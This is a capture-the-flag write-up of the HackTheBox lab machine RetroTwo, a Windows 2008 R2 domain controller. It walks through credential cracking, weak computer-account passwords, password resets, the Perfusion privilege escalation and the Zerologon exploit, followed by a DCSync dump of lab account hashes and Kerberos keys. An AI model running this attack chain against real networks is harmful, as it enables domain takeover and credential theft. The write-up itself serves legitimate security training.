HTB: RetroTwo
RetroTwo starts with an open SMB share with an Access database. In a macro module attached to the DB, I’ll find a script with valid domain creds. That allows me to collect BloodHound data, where I’ll find two computers with pre-Windows 2000 weak passwords. I’ll abuse that to get access to another computer account, and then RDP. From there, I’ll find an old OS, and show two different well known vulnerabilities to exploit it, Perfusion and ZeroLogon.
Box Info
| Name | RetroTwo  Play on HackTheBox |
|---|---|
| Release Date | 22 Jul 2025 |
| Retire Date | 22 Jul 2025 |
| OS | Windows  |
| Base Points | Easy [20] |
 |
N/A (non-competitive) |
 |
N/A (non-competitive) |
| Creator |  |
Recon
Initial Scanning
nmap finds many open TCP ports:
oxdf@hacky$ nmap -p- -vvv --min-rate 10000 10.129.234.168
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-07-18 15:52 UTC
...[snip]...
Completed SYN Stealth Scan at 15:52, 13.26s elapsed (65535 total ports)
Nmap scan report for 10.129.234.168
Host is up, received echo-reply ttl 127 (0.092s latency).
Scanned at 2025-07-18 15:52:02 UTC for 13s
Not shown: 65516 filtered tcp ports (no-response)
PORT STATE SERVICE REASON
53/tcp open domain syn-ack ttl 127
88/tcp open kerberos-sec syn-ack ttl 127
135/tcp open msrpc syn-ack ttl 127
139/tcp open netbios-ssn syn-ack ttl 127
389/tcp open ldap syn-ack ttl 127
445/tcp open microsoft-ds syn-ack ttl 127
464/tcp open kpasswd5 syn-ack ttl 127
593/tcp open http-rpc-epmap syn-ack ttl 127
636/tcp open ldapssl syn-ack ttl 127
3268/tcp open globalcatLDAP syn-ack ttl 127
3269/tcp open globalcatLDAPssl syn-ack ttl 127
3389/tcp open ms-wbt-server syn-ack ttl 127
5722/tcp open msdfsr syn-ack ttl 127
9389/tcp open adws syn-ack ttl 127
49154/tcp open unknown syn-ack ttl 127
49155/tcp open unknown syn-ack ttl 127
49157/tcp open unknown syn-ack ttl 127
49158/tcp open unknown syn-ack ttl 127
49165/tcp open unknown syn-ack ttl 127
Read data files from: /usr/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 13.45 seconds
Raw packets sent: 131058 (5.767MB) | Rcvd: 23 (996B)
oxdf@hacky$ nmap -p 53,88,135,139,389,445,464,593,636,3268,3269,3389,5722,9389 -sCV 10.129.234.168
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-07-18 15:53 UTC
Nmap scan report for 10.129.234.168
Host is up (0.092s latency).
PORT STATE SERVICE VERSION
53/tcp open domain Microsoft DNS 6.1.7601 (1DB15F75) (Windows Server 2008 R2 SP1)
| dns-nsid:
|_ bind.version: Microsoft DNS 6.1.7601 (1DB15F75)
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2025-07-18 16:09:37Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: retro2.vl, Site: Default-First-Site-Name)
445/tcp open microsoft-ds Windows Server 2008 R2 Datacenter 7601 Service Pack 1 microsoft-ds (workgroup: RETRO2)
464/tcp open tcpwrapped
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: retro2.vl, Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
3389/tcp open ssl/ms-wbt-server?
|_ssl-date: 2025-07-18T16:11:12+00:00; +16m04s from scanner time.
| ssl-cert: Subject: commonName=BLN01.retro2.vl
| Not valid before: 2025-03-17T09:40:28
|_Not valid after: 2025-09-16T09:40:28
5722/tcp open msrpc Microsoft Windows RPC
9389/tcp open mc-nmf .NET Message Framing
Service Info: Host: BLN01; OS: Windows; CPE: cpe:/o:microsoft:windows_server_2008:r2:sp1, cpe:/o:microsoft:windows
Host script results:
| smb2-security-mode:
| 2:1:0:
|_ Message signing enabled and required
| smb2-time:
| date: 2025-07-18T16:10:32
|_ start_date: 2025-07-18T16:05:11
| smb-os-discovery:
| OS: Windows Server 2008 R2 Datacenter 7601 Service Pack 1 (Windows Server 2008 R2 Datacenter 6.1)
| OS CPE: cpe:/o:microsoft:windows_server_2008::sp1
| Computer name: BLN01
| NetBIOS computer name: BLN01\x00
| Domain name: retro2.vl
| Forest name: retro2.vl
| FQDN: BLN01.retro2.vl
|_ System time: 2025-07-18T18:10:35+02:00
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: required
|_clock-skew: mean: -13m54s, deviation: 59m57s, median: 16m03s
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 105.64 seconds
The box shows many of the ports associated with a Windows Domain Controller. The domain is retro2.vl, and the hostname is BLN01. It also identifies the OS as Server 2008 R2, which is quite old at this point.
All of the ports show a TTL of 127, which matches the expected TTL for Windows one hop away.
I’ll use netexec to generate a line for my hosts file:
oxdf@hacky$ netexec smb 10.129.234.168 --generate-hosts-file hosts
SMB 10.129.234.168 445 BLN01 [*] Windows 7 / Server 2008 R2 Build 7601 x64 (name:BLN01) (domain:retro2.vl) (signing:True) (SMBv1:True)
oxdf@hacky$ cat hosts
10.129.234.168 BLN01.retro2.vl retro2.vl BLN01
oxdf@hacky$ cat hosts /etc/hosts | sponge /etc/hosts
SMB - TCP 445
The guest account is able to list shares on RetroTwo:
oxdf@hacky$ netexec smb BLN01.retro2.vl -u guest -p '' --shares
SMB 10.129.234.168 445 BLN01 [*] Windows 7 / Server 2008 R2 Build 7601 x64 (name:BLN01) (domain:retro2.vl) (signing:True) (SMBv1:True)
SMB 10.129.234.168 445 BLN01 [+] retro2.vl\guest:
SMB 10.129.234.168 445 BLN01 [*] Enumerated shares
SMB 10.129.234.168 445 BLN01 Share Permissions Remark
SMB 10.129.234.168 445 BLN01 ----- ----------- ------
SMB 10.129.234.168 445 BLN01 ADMIN$ Remote Admin
SMB 10.129.234.168 445 BLN01 C$ Default share
SMB 10.129.234.168 445 BLN01 IPC$ Remote IPC
SMB 10.129.234.168 445 BLN01 NETLOGON Logon server share
SMB 10.129.234.168 445 BLN01 Public READ
SMB 10.129.234.168 445 BLN01 SYSVOL Logon server share
The Public share is custom to RetroTwo (the rest are the standard DC shares). I’ll connect and find two directories:
oxdf@hacky$ smbclient -N //BLN01.retro2.vl/public
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Sat Aug 17 14:30:37 2024
.. D 0 Sat Aug 17 14:30:37 2024
DB D 0 Sat Aug 17 12:07:06 2024
Temp D 0 Sat Aug 17 11:58:05 2024
6290943 blocks of size 4096. 800532 blocks available
Temp is empty, but DB has a Microsoft Access database file:
smb: \> ls DB\
. D 0 Sat Aug 17 12:07:06 2024
.. D 0 Sat Aug 17 12:07:06 2024
staff.accdb A 876544 Sat Aug 17 14:30:19 2024
6290943 blocks of size 4096. 800532 blocks available
I’ll download that file:
smb: \DB\> get staff.accdb
getting file \DB\staff.accdb of size 876544 as staff.accdb (473.5 KiloBytes/sec) (average 306.6 KiloBytes/sec)
It is an Access database:
oxdf@hacky$ file staff.accdb
staff.accdb: Microsoft Access Database
Auth as ldapreader
Recover Password
Trying to open the database file in Microsoft Access pops a prompt asking for a password. I’ll use office2john.py from john to get a hash from the file:
oxdf@hacky$ /opt/john/run/office2john.py staff.accdb | tee staff.accdb.hash
staff.accdb:$office$*2013*100000*256*16*5736cfcbb054e749a8f303570c5c1970*1ec683f4d8c4e9faf77d3c01f2433e56*7de0d4af8c54c33be322dbc860b68b4849f811196015a3f48a424a265d018235
I’ll give that to hashcat with rockyou.txt (from SecLists) and it quickly cracks the password:
$ hashcat staff.accdb.hash /opt/SecLists/Passwords/Leaked-Databases/rockyou.txt --user
hashcat (v6.2.6) starting in autodetect mode
...[snip]...
Hash-mode was not specified with -m. Attempting to auto-detect hash mode.
The following mode was auto-detected as the only one matching your input hash:
9600 | MS Office 2013 | Document
...[snip]...
$office$*2013*100000*256*16*5736cfcbb054e749a8f303570c5c1970*1ec683f4d8c4e9faf77d3c01f2433e56*7de0d4af8c54c33be322dbc860b68b4849f811196015a3f48a424a265d018235:class08
...[snip]...
The password is “class08”.
Database
I spent far too long looking for a way to access this file from Linux, but eventually gave up. I’ll open the file in Access on Windows, and it asks for the password:
On entering the password, it loads. I haven’t activated this Office instance, so my options are limited. But I can still see one table and one Module on the left side:
The StaffMembers table seems empty. In this un-activated Access, the only option I have for the module is to export it:
I’ll save it as a text file. It’s VBA code:
Attribute VB_Name = "Staff"
Option Compare Database
Sub ImportStaffUsersFromLDAP()
Dim objConnection As Object
Dim objCommand As Object
Dim objRecordset As Object
Dim strLDAP As String
Dim strUser As String
Dim strPassword As String
Dim strSQL As String
Dim db As Database
Dim rst As Recordset
strLDAP = "LDAP://OU=staff,DC=retro2,DC=vl"
strUser = "retro2\ldapreader"
strPassword = "ppYaVcB5R"
Set objConnection = CreateObject("ADODB.Connection")
objConnection.Provider = "ADsDSOObject"
objConnection.Properties("User ID") = strUser
objConnection.Properties("Password") = strPassword
objConnection.Properties("Encrypt Password") = True
objConnection.Open "Active Directory Provider"
Set objCommand = CreateObject("ADODB.Command")
objCommand.ActiveConnection = objConnection
objCommand.CommandText = "<" & strLDAP & ">;(objectCategory=person);cn,distinguishedName,givenName,sn,sAMAccountName,userPrincipalName,description;subtree"
Set objRecordset = objCommand.Execute
Set db = CurrentDb
Set rst = db.OpenRecordset("StaffMembers", dbOpenDynaset)
Do Until objRecordset.EOF
rst.AddNew
rst!CN = objRecordset.Fields("cn").Value
rst!DistinguishedName = objRecordset.Fields("distinguishedName").Value
rst!GivenName = Nz(objRecordset.Fields("givenName").Value, "")
rst!SN = Nz(objRecordset.Fields("sn").Value, "")
rst!sAMAccountName = objRecordset.Fields("sAMAccountName").Value
rst!UserPrincipalName = Nz(objRecordset.Fields("userPrincipalName").Value, "")
rst!Description = Nz(objRecordset.Fields("description").Value, "")
rst.Update
objRecordset.MoveNext
Loop
rst.Close
objRecordset.Close
objConnection.Close
Set rst = Nothing
Set objRecordset = Nothing
Set objCommand = Nothing
Set objConnection = Nothing
MsgBox "Staff users imported successfully!", vbInformation
End Sub
It’s code to populate the DB with staff over LDAP, and there are creds.
Validate Creds
The creds from the script work over SMB:
oxdf@hacky$ netexec smb BLN01.retro2.vl -u ldapreader -p ppYaVcB5R
SMB 10.129.234.168 445 BLN01 [*] Windows 7 / Server 2008 R2 Build 7601 x64 (name:BLN01) (domain:retro2.vl) (signing:True) (SMBv1:True)
SMB 10.129.234.168 445 BLN01 [+] retro2.vl\ldapreader:ppYaVcB5R
Auth as FS01$
Bloodhound
Collection
I’ll collect Bloodhound data with both netexec and RustHound-CE. For netexec, it’s important to include --c All or it won’t get something necessary for this box:
oxdf@hacky$ netexec ldap BLN01.retro2.vl -u ldapreader -p ppYaVcB5R --bloodhound --dns-server 10.129.234.168 -c All
LDAP 10.129.234.168 389 BLN01 [*] Windows 7 / Server 2008 R2 Build 7601 (name:BLN01) (domain:retro2.vl) (signing:None) (channel binding:No TLS cert)
LDAP 10.129.234.168 389 BLN01 [+] retro2.vl\ldapreader:ppYaVcB5R
LDAP 10.129.234.168 389 BLN01 Resolved collection methods: localadmin, trusts, acl, psremote, objectprops, dcom, rdp, container, group, session
LDAP 10.129.234.168 389 BLN01 Done in 0M 18S
LDAP 10.129.234.168 389 BLN01 Compressing output into /home/oxdf/.nxc/logs/BLN01_10.129.234.168_2025-07-19_191250_bloodhound.zip
Rusthound completely misses the needed interaction for this box (though they are very quick to update so it’ll likely be fixed soon):
oxdf@hacky$ rusthound-ce --domain retro2.vl -u ldapreader -p ppYaVcB5R --zip
---------------------------------------------------
Initializing RustHound-CE at 14:56:16 on 07/19/25
Powered by @g0h4n_0
---------------------------------------------------
[2025-07-19T14:56:16Z INFO rusthound_ce] Verbosity level: Info
[2025-07-19T14:56:16Z INFO rusthound_ce] Collection method: All
[2025-07-19T14:56:17Z INFO rusthound_ce::ldap] Connected to RETRO2.VL Active Directory!
[2025-07-19T14:56:17Z INFO rusthound_ce::ldap] Starting data collection...
[2025-07-19T14:56:17Z INFO rusthound_ce::ldap] Ldap filter : (objectClass=*)
[2025-07-19T14:56:18Z INFO rusthound_ce::ldap] All data collected for NamingContext DC=retro2,DC=vl
[2025-07-19T14:56:18Z INFO rusthound_ce::ldap] Ldap filter : (objectClass=*)
[2025-07-19T14:56:19Z INFO rusthound_ce::ldap] All data collected for NamingContext CN=Configuration,DC=retro2,DC=vl
[2025-07-19T14:56:19Z INFO rusthound_ce::ldap] Ldap filter : (objectClass=*)
[2025-07-19T14:56:20Z INFO rusthound_ce::ldap] All data collected for NamingContext CN=Schema,CN=Configuration,DC=retro2,DC=vl
[2025-07-19T14:56:20Z INFO rusthound_ce::ldap] Ldap filter : (objectClass=*)
[2025-07-19T14:56:21Z INFO rusthound_ce::ldap] All data collected for NamingContext DC=DomainDnsZones,DC=retro2,DC=vl
[2025-07-19T14:56:21Z INFO rusthound_ce::ldap] Ldap filter : (objectClass=*)
[2025-07-19T14:56:21Z INFO rusthound_ce::ldap] All data collected for NamingContext DC=ForestDnsZones,DC=retro2,DC=vl
[2025-07-19T14:56:21Z INFO rusthound_ce::api] Starting the LDAP objects parsing...
[2025-07-19T14:56:21Z INFO rusthound_ce::objects::domain] MachineAccountQuota: 10
[2025-07-19T14:56:21Z INFO rusthound_ce::api] Parsing LDAP objects finished!
[2025-07-19T14:56:21Z INFO rusthound_ce::json::checker] Starting checker to replace some values...
[2025-07-19T14:56:21Z INFO rusthound_ce::json::checker] Checking and replacing some values finished!
[2025-07-19T14:56:21Z INFO rusthound_ce::json::maker::common] 27 users parsed!
[2025-07-19T14:56:21Z INFO rusthound_ce::json::maker::common] 51 groups parsed!
[2025-07-19T14:56:21Z INFO rusthound_ce::json::maker::common] 4 computers parsed!
[2025-07-19T14:56:21Z INFO rusthound_ce::json::maker::common] 2 ous parsed!
[2025-07-19T14:56:21Z INFO rusthound_ce::json::maker::common] 3 domains parsed!
[2025-07-19T14:56:21Z INFO rusthound_ce::json::maker::common] 2 gpos parsed!
[2025-07-19T14:56:21Z INFO rusthound_ce::json::maker::common] 67 containers parsed!
[2025-07-19T14:56:21Z INFO rusthound_ce::json::maker::common] .//20250719145621_retro2-vl_rusthound-ce.zip created!
RustHound-CE Enumeration Completed at 14:56:21 on 07/19/25! Happy Graphing!
ldapreader
I’ll load both zip archives into the BloodHound CE docker instance and start by marking ldapreader as owned:
Unfortunately, this account doesn’t have any outbound control or anything interesting as far as memberships:
Computers
There are three members of the Domain Computers group:
Pre-Windows 2000 Compatibility
Especially given the name of the box and the vulnerability in the previous Retro box, it’s worth checking for Pre-Windows 2000 compatibility with the computer accounts. netexec shows four computer accounts:
oxdf@hacky$ netexec ldap BLN01.retro2.vl -u ldapreader -p ppYaVcB5R --computers
LDAP 10.129.234.168 389 BLN01 [*] Windows 7 / Server 2008 R2 Build 7601 (name:BLN01) (domain:retro2.vl) (signing:None) (channel binding:No TLS cert)
LDAP 10.129.234.168 389 BLN01 [+] retro2.vl\ldapreader:ppYaVcB5R
LDAP 10.129.234.168 389 BLN01 [*] Total records returned: 4
LDAP 10.129.234.168 389 BLN01 BLN01$
LDAP 10.129.234.168 389 BLN01 ADMWS01$
LDAP 10.129.234.168 389 BLN01 FS01$
LDAP 10.129.234.168 389 BLN01 FS02$
I’ll create a list of computer names, and from it a list of passwords in lowercase without the “$”:
oxdf@hacky$ cat computers | tr -d '$' | tr '[:upper:]' '[:lower:]' | tee pre2000-passwords
bln01
admws01
fs01
fs02
Now running these lists through netexec shows two that fail with STATUS_LOGON_FAILURE, and two that have STATUS_NOLOGON_WORKSTATION_TRUST_ACCOUNT:
oxdf@hacky$ netexec smb BLN01.retro2.vl -u computers -p pre2000-passwords --no-bruteforce --continue-on-success
SMB 10.129.234.168 445 BLN01 [*] Windows 7 / Server 2008 R2 Build 7601 x64 (name:BLN01) (domain:retro2.vl) (signing:True) (SMBv1:True)
SMB 10.129.234.168 445 BLN01 [-] retro2.vl\BLN01$:bln01 STATUS_LOGON_FAILURE
SMB 10.129.234.168 445 BLN01 [-] retro2.vl\ADMWS01$:admws01 STATUS_LOGON_FAILURE
SMB 10.129.234.168 445 BLN01 [-] retro2.vl\FS01$:fs01 STATUS_NOLOGON_WORKSTATION_TRUST_ACCOUNT
SMB 10.129.234.168 445 BLN01 [-] retro2.vl\FS02$:fs02 STATUS_NOLOGON_WORKSTATION_TRUST_ACCOUNT
STATUS_NOLOGON_WORKSTATION_TRUST_ACCOUNT is common in this situation where the password has not been used yet. The original Diving into Pre-Created Computer Accounts post from TrustedSec suggests changing the password. But I can also just add -k to use Kerberos auth:
oxdf@hacky$ netexec smb BLN01.retro2.vl -u computers -p pre2000-passwords --no-bruteforce --continue-on-success -k
SMB BLN01.retro2.vl 445 BLN01 [*] Windows 7 / Server 2008 R2 Build 7601 x64 (name:BLN01) (domain:retro2.vl) (signing:True) (SMBv1:True)
SMB BLN01.retro2.vl 445 BLN01 [-] retro2.vl\BLN01$:bln01 KDC_ERR_PREAUTH_FAILED
SMB BLN01.retro2.vl 445 BLN01 [-] retro2.vl\ADMWS01$:admws01 KDC_ERR_PREAUTH_FAILED
SMB BLN01.retro2.vl 445 BLN01 [+] retro2.vl\FS01$:fs01
SMB BLN01.retro2.vl 445 BLN01 [+] retro2.vl\FS02$:fs02
The creds for both FS01$ and FS02$ work!
RDP as ldapreader
Enumeration
It seems that members of the Domain Computers group have GenericWrite over other members of the same group:
ADMWS01 shows some additional outbound control:
If I use the prebuilt “Shortest paths from Owned objects”, it shows a path from FS01$ through ADMWS01$ to add members to the Services group which is a member of the Remote Desktop Users group:
Reset ADMWS01$ Password
To avoid having to change the password on FS01$, I’ll get a TGT using netexec:
oxdf@hacky$ netexec smb BLN01.retro2.vl -u 'FS01$' -p fs01 -k --generate-tgt FS01
SMB BLN01.retro2.vl 445 BLN01 [*] Windows 7 / Server 2008 R2 Build 7601 x64 (name:BLN01) (domain:retro2.vl) (signing:True) (SMBv1:True)
SMB BLN01.retro2.vl 445 BLN01 [+] retro2.vl\FS01$:fs01
SMB BLN01.retro2.vl 445 BLN01 [+] TGT saved to: FS01.ccache
SMB BLN01.retro2.vl 445 BLN01 [+] Run the following command to use the TGT: export KRB5CCNAME=FS01.ccache
That allows me to change the computer password using addcomputer.py from Impacket with the -no-add option to just change the password:
oxdf@hacky$ KRB5CCNAME=FS01.ccache addcomputer.py -computer-name 'ADMWS01$' -computer-pass '0xdf0xdf' -no-add -k -no-pass -dc-host BLN01.retro2.vl 'retro2.vl/FS01$'
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[*] Successfully set password of ADMWS01$ to 0xdf0xdf.
It works:
oxdf@hacky$ netexec smb BLN01.retro2.vl -u 'ADMWS01$' -p 0xdf0xdf
SMB 10.129.234.168 445 BLN01 [*] Windows 7 / Server 2008 R2 Build 7601 x64 (name:BLN01) (domain:retro2.vl) (signing:True) (SMBv1:True)
SMB 10.129.234.168 445 BLN01 [+] retro2.vl\ADMWS01$:0xdf0xdf
RDP
With access to ADMWS01$, I can add members to the Services group. I’ll use BloodyAD:
oxdf@hacky$ bloodyAD --host BLN01.retro2.vl -d retro2.vl -u 'ADMWS01$' -p 0xdf0xdf add groupMember Services ldapreader
[+] ldapreader added to Services
Now I’ll connect to remote desktop (RDP) using xfreerdp /u:ldapreader /p:ppYaVcB5R /v:BLN01.retro2.vl /tls-seclevel:0:
user.txt is at the root of the C: drive:
I’ll grab it:
Shell as System / Administrator
Enumeration
The host is running Windows 2008 R2 as expected from nmap:
PS C:\> systeminfo
Host Name: BLN01
OS Name: Microsoft Windows Server 2008 R2 Datacenter
OS Version: 6.1.7601 Service Pack 1 Build 7601
OS Manufacturer: Microsoft Corporation
OS Configuration: Primary Domain Controller
OS Build Type: Multiprocessor Free
Registered Owner: Windows User
Registered Organization:
Product ID: 55041-402-3582622-84981
Original Install Date: 8/17/2024, 10:41:46 AM
System Boot Time: 7/18/2025, 6:04:41 PM
System Manufacturer: VMware, Inc.
System Model: VMware Virtual Platform
System Type: x64-based PC
Processor(s): 1 Processor(s) Installed.
[01]: AMD64 Family 23 Model 49 Stepping 0 AuthenticAMD ~2994 Mhz
BIOS Version: Phoenix Technologies LTD 6.00, 11/12/2020
Windows Directory: C:\Windows
System Directory: C:\Windows\system32
Boot Device: \Device\HarddiskVolume1
System Locale: en-us;English (United States)
Input Locale: en-us;English (United States)
Time Zone: (UTC+01:00) Amsterdam, Berlin, Bern, Rome, Stockholm, Vienna
Total Physical Memory: 4,095 MB
Available Physical Memory: 3,040 MB
Virtual Memory: Max Size: 8,189 MB
Virtual Memory: Available: 7,100 MB
Virtual Memory: In Use: 1,089 MB
Page File Location(s): C:\pagefile.sys
Domain: retro2.vl
Logon Server: \\BLN01
Hotfix(s): N/A
Network Card(s): 1 NIC(s) Installed.
[01]: vmxnet3 Ethernet Adapter
Connection Name: Local Area Connection 5
DHCP Enabled: Yes
DHCP Server: 10.129.0.1
IP address(es)
[01]: 10.129.234.168
[02]: fe80::2122:e847:ed0d:a323
[03]: dead:beef::2122:e847:ed0d:a323
There are probably many ways to exploit an OS this old. I’ll show two.
Perfusion
Background
The intended path for this machine is to use Perfusion, an exploit released in 2021 by itm4n, accompanied by a blog post, An Unconventional Exploit for the RpcEptMapper Registry Key Vulnerability.
The issue is the permissions on a registry key that has to do with performance counters on the machine. Any user can write to this key, and any user can then query the performance counters, which can lead to a DLL specified in that key being loaded as NT Authority\System.
The author made an exploit that handles all of this. It creates a suspended process, writes the DLL, writes the reg key, calls the WMI class Win32_Pref to invoke the DLL load, gets the process token for NT Authority\System, and duplicates it into the suspended process.
Compile
The GitHub repo doesn’t have a compiled binary, so I’ll have to take care of that. I’ll download the repo to my Windows VM and open the .sln file in Visual Studio. I did have to allow VS to upgrade to the current versions of the runtime on my VM, but then it built just fine from Built –> Build Solution. Before doing that, I will make sure to switch the configuration to Release from Debug.
I’ll copy the resulting Perfusion.exe back to my Linux VM. There I can copy it from the file explorer and paste it onto the Desktop of RetroTwo.
Exploit
Now I’ll run the exploit to get a shell as System:
PS C:\Users\ldapreader\Desktop> .\Perfusion.exe -c cmd -i
[*] Created Performance DLL: C:\Users\LDAPRE~1\AppData\Local\Temp\2\performance_2896_740_2.dll
[*] Created Performance registry key.
[*] Triggered Performance data collection.
[+] Exploit completed. Got a SYSTEM token! :)
[*] Waiting for the Trigger Thread to terminate... OK
[!] Failed to delete Performance registry key.
[*] Deleted Performance DLL.
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
C:\Users\ldapreader\Desktop>whoami
nt authority\system
With this shell I’ll grab root.txt:
C:\Users\administrator\Desktop>dir
Volume in drive C has no label.
Volume Serial Number is 98B0-04D7
Directory of C:\Users\administrator\Desktop
08/17/2024 04:17 PM <DIR> .
08/17/2024 04:17 PM <DIR> ..
04/11/2025 01:00 PM 32 root.txt
1 File(s) 32 bytes
2 Dir(s) 3,217,920,000 bytes free
C:\Users\administrator\Desktop>type root.txt
cb462daa************************
ZeroLogin
Background
In September 2020, Secura released a paper titled Zerologon outlining researching that led to CVE-2020-1472. The vulnerability is in the cryptographic implementation used in the logon process, and effectively allowed any user to authenticate as any user. The issue has to do with how the code used a fixed initialization vector (IV) of all zeros, which allows the attacker to spoof a password typically in less than 256 attempts.
Exploit
This exploit can be executed pre-authentication, remotely. I’ll grab a POC here, and add the requirements with uv:
oxdf@hacky$ uv add --script cve-2020-1472-exploit.py impacket
Updated `cve-2020-1472-exploit.py`
oxdf@hacky$ uv run --script cve-2020-1472-exploit.py
Installed 21 packages in 40ms
Usage: zerologon_tester.py <dc-name> <dc-ip>
Tests whether a domain controller is vulnerable to the Zerologon attack. Resets the DC account password to an empty string when vulnerable.
Note: dc-name should be the (NetBIOS) computer name of the domain controller.
Now I give it the DC name and the IP:
oxdf@hacky$ uv run --script cve-2020-1472-exploit.py bln01 10.129.234.168
Performing authentication attempts...
============================================================================================================================================================================================================================================================================================================================================================================
Target vulnerable, changing account password to empty string
Result: 0
Exploit complete!
With the machine account password set to an empty string, I can DCSync:
oxdf@hacky$ secretsdump.py -just-dc -no-pass 'bln01$@10.129.234.168'
/home/oxdf/.local/share/uv/tools/impacket/lib/python3.12/site-packages/impacket/version.py:12: UserWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html. The pkg_resources package is slated for removal as early as 2025-11-30. Refrain from using this package or pin to Setuptools<81.
import pkg_resources
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:c06552bdb50ada21a7c74536c231b848:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:1e242a90fb9503f383255a4328e75756:::
admin:1000:aad3b435b51404eeaad3b435b51404ee:49c31c8f60320b9f416bc248231c008c:::
Julie.Martin:1105:aad3b435b51404eeaad3b435b51404ee:cf4999af837f40d72d1c5bcec27ba9b6:::
Clare.Smith:1106:aad3b435b51404eeaad3b435b51404ee:a7c82ec08414f0c54637fad20b9aac9e:::
Laura.Davies:1107:aad3b435b51404eeaad3b435b51404ee:ee74607fad6d8c51b0d488e322f82317:::
Rhys.Richards:1108:aad3b435b51404eeaad3b435b51404ee:09377f210fdbdcda6f97eda91ddc6879:::
Leah.Robinson:1109:aad3b435b51404eeaad3b435b51404ee:6333c620221c04d8fb5b6d7ca8b6d6d7:::
Michelle.Bird:1110:aad3b435b51404eeaad3b435b51404ee:c823220a9bda3ca70ebe7362187c9004:::
Kayleigh.Stephenson:1111:aad3b435b51404eeaad3b435b51404ee:a78835f0139b3b206f9598fe9c18d707:::
Charles.Singh:1112:aad3b435b51404eeaad3b435b51404ee:432119e62a10aff8c8200e4f45e772a0:::
Sam.Humphreys:1113:aad3b435b51404eeaad3b435b51404ee:3c1508fc774de1e6040c68b41a17fdee:::
Margaret.Austin:1114:aad3b435b51404eeaad3b435b51404ee:c6ebda46b0b014eda3ffcb8d92d179d9:::
Caroline.James:1115:aad3b435b51404eeaad3b435b51404ee:80835fee4ce88524f63a0ecf60870ac0:::
Lynda.Giles:1116:aad3b435b51404eeaad3b435b51404ee:dbf17856bd378ec410c20b98a749571f:::
Emily.Price:1117:aad3b435b51404eeaad3b435b51404ee:9cdf1d59674a6ddfedef2ae2545d3862:::
Lynne.Dennis:1118:aad3b435b51404eeaad3b435b51404ee:4b690295089b91881633113f13c866ee:::
Alexandra.Black:1119:aad3b435b51404eeaad3b435b51404ee:3349f04c2fdcf796a66c37b2a7658ae6:::
Alex.Scott:1120:aad3b435b51404eeaad3b435b51404ee:200155446e3b3817e8bc857dfe01b58c:::
Mandy.Davies:1121:aad3b435b51404eeaad3b435b51404ee:c144842c62c3051b8f1b8467ec62ef1f:::
Marilyn.Whitehouse:1122:aad3b435b51404eeaad3b435b51404ee:097b5b5b97e2a3b07db0b3deac5cd303:::
Lindsey.Harrison:1123:aad3b435b51404eeaad3b435b51404ee:261b8b9c79b19345e8ea15dcdfc03ecd:::
Sally.Davey:1124:aad3b435b51404eeaad3b435b51404ee:78ac830ac29ae1df8fa569b39515d5a5:::
retro2.vl\inventory:1128:aad3b435b51404eeaad3b435b51404ee:46b019644dde01251e7044a3d4185bd1:::
retro2.vl\ldapreader:1130:aad3b435b51404eeaad3b435b51404ee:fe63aaefd1cfd29d7cc5c14321a725f3:::
BLN01$:1001:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
ADMWS01$:1127:aad3b435b51404eeaad3b435b51404ee:a5c0bab5dbb71d3f8b7b42b599108fbb:::
FS01$:1131:aad3b435b51404eeaad3b435b51404ee:44a59c02ec44a90366ad1d0f8a781274:::
FS02$:1132:aad3b435b51404eeaad3b435b51404ee:eb354224f433cd7cd824b1fdce8c0795:::
[*] Kerberos keys grabbed
krbtgt:aes256-cts-hmac-sha1-96:1de3d3d429521d8d99e4b4b31da5ce5f993902a8876adaabdd9449a5256c220f
krbtgt:aes128-cts-hmac-sha1-96:8250eee9083a48b1fca675d7d0ce3699
krbtgt:des-cbc-md5:d334438313291520
admin:aes256-cts-hmac-sha1-96:055842e1ada4e1cba5bd0286a4fa9de9337b0324104adc533aabea23ddc353b7
admin:aes128-cts-hmac-sha1-96:1e0f4d9eb0ea70d225db67d53f297934
admin:des-cbc-md5:70d0624397c708df
Julie.Martin:aes256-cts-hmac-sha1-96:5428f080b3303d74da2a344d0b799d97dfb5795fee1d1ed64b3e7e9cc3cbec5c
Julie.Martin:aes128-cts-hmac-sha1-96:8757cfac9fd8af791bd8f5c9b8bfac0c
Julie.Martin:des-cbc-md5:0e85dca2e3e6291a
Clare.Smith:aes256-cts-hmac-sha1-96:65c7c8d4e980f1e63fab4af0fb8b8dc17e9bddff20e7b8bb5fa5c1690561f406
Clare.Smith:aes128-cts-hmac-sha1-96:54cc3c8caadcd6e9b605d2da4c96e55f
Clare.Smith:des-cbc-md5:61fe8f52b39ecb9d
Laura.Davies:aes256-cts-hmac-sha1-96:9ada131aebb330b859770d3177e4b6bf2e37e994d83761e83c296e3dd0549fa4
Laura.Davies:aes128-cts-hmac-sha1-96:c00363c7acdb7e6efb47e90c46eb73f5
Laura.Davies:des-cbc-md5:31d670ec9b16c762
Rhys.Richards:aes256-cts-hmac-sha1-96:805f8d2f3f6c92cbf7bf0fc2449ec03ac8446b0f595aeb68d5e34932bdf1f9a8
